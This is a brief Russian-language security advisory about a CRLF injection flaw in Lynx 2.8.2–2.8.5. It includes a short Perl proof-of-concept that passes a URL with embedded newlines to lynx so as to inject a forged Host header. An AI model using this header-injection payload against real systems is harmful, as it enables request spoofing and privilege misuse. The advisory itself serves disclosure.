Уязвимость внедрения CRLF, обнаруженная в Lynx, позволяет атакующему внедрять дополнительные HTTP заголовки в просматриваемые страницы. Если Lynx вызывается
из командной строки, символ CRLF может быть включен в указанный URL. Эти символы не фильтруются при создании HTTP запроса. Например, если атакующий изменил заголовок 'Host', запрос будет обслуживаться так, как будто он был сделан в другом домене, тем самым обеспечивая
нападающему большие привилегии. 

Эксплоит:

#!/usr/bin/perl --
# Ulf Harnhammar 2002
# example: ./exploit www.site1.st www.site2.st
# will show www.site2.st
die "$0 hostone hosttwo\n" if @ARGV != 2;
exec('lynx "'.
"http://$ARGV[0]/ HTTP/1.0\012".
"Host: $ARGV[1]\012\012".
'"');

Уязвимость обнаружена в University of Kansas Lynx 2.8.2-2.8.5.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии